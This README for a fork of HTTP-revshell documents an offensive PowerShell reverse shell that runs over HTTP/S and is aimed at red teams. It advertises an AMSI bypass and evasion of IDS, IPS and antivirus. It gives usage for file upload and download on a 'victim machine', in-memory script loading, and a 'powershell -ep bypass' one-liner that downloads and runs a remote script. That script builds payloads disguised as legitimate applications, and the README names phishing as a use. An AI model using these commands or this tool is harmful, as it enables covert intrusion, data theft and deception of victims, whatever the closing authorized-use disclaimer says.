Revshell focused on red teams and pentesters with AMSI Bypass. This tool provides a reverse connection through the http/s protocol. It uses a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS and AV.
This work is mosty entirely @3v4Si0N very well done job. I have made some customizations to make the code work in a few other scenarios than what was intened. ALL CREDITS OF THIS PROJECT GOES TO 3v4Si0N and his amazing work. You should fork his project rather than this: https://github.com/3v4Si0N/HTTP-revshell/
SSL
Proxy Aware
Upload files
Download files
Load powershell scripts through the server
Error Control
AMSI bypass
Autocomplete PowerShell functions (optional)
usage: server.py [-h] [--ssl] [--autocomplete] host port
Process some integers.
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
Client usage:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
This function allow you to upload any file to the victim machine.
Usage:
upload /src/path/file C:\dest\path\file
This function allow you to download a file to the attacker machine.
Usage:
download C:\src\path\file /dst/path/file
This function allows you to load from powershell scripts without having to write to the victim's disk, reading the file through legitimate HTTP traffic.
Usage:
loadps1 /path/to/the/local/server/PowershellScript.ps1
This script allows you to create an executable file with the payload necessary to use HTTP-revshell, you just need to follow the instructions on the screen to generate it. There are 6 predefined templates and a customizable one, with the data that you like.
The payloads generated by the tool, incorporate the legitimate icon of the application, as well as the product and copyright information of the original application. In addition, each of them opens the original application before establishing the connection with the server, pretending to be a legitimate application. This can be used for phishing or Red Team exercises.
Payload Generator usage:
powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"
JoelGMSec for his awesome Revshell-Generator.ps1. Twitter: @JoelGMSec
This script is licensed under LGPLv3+. Direct link to License.
HTTP-revshell should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.
This work is mosty entirely @3v4Si0N very well done job. I have made some customizations to make the code work in a few other scenarios than what was intened. ALL CREDITS OF THIS PROJECT GOES TO 3v4Si0N and his amazing work. You should fork his project rather than this: https://github.com/3v4Si0N/HTTP-revshell/